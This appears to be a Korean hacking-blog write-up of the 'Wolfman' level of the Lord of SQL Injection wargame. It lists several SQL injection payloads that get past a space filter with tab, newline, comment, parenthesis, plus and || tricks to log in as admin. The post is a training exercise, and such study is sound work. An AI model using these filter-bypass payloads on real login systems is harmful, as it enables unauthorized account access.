D1N0's hacking blog
Lord of SQL injection - Wolfman 본문
문제 풀이
언뜻 보면 pw=' or id = 'admin';%23으로 풀 수 있을 것 같지만 코드를 보면 공백을 필터링하고 있다
불필요한 공백을 지우더라도 or과 id는 띄워야 한다
SQL에서 공백은 Tab, Line Feed, Carrage Return, 주석, 괄호, + 등으로 우회 가능하다
첫 번째 풀이
pw='or%09id='admin';%23
공백이 필요한 부분에 Tab(%09)을 넣어 필터링을 우회했다
불필요한 공백을 다 지웠지만 중간중간 Tab을 더 넣어도 문제는 없다
Tab 대신 LF(%0a), CR(%0d)를 넣어도 된다
두 번째 풀이
pw='or/**/id='admin';%23
pw='or(id)='admin';%23
pw='or%2bid='admin';%23
각각 주석, 괄호, +로 우회하였다
세 번째 풀이
pw='||id='admin';%23
공백이 나오지 않도록 or 대신 ||으로 써도 통과할 수 있다
'Web > Lord of SQL injection' 카테고리의 다른 글
Lord of SQL injection - Orge (0) | 2020.11.11 |
---|---|
Lord of SQL injection - Darkelf (0) | 2020.11.11 |
Lord of SQL injection - Orc (0) | 2020.11.10 |
Lord of SQL injection - Goblin (0) | 2020.11.10 |
Lord of SQL injection - Cobolt (0) | 2020.11.10 |
Comments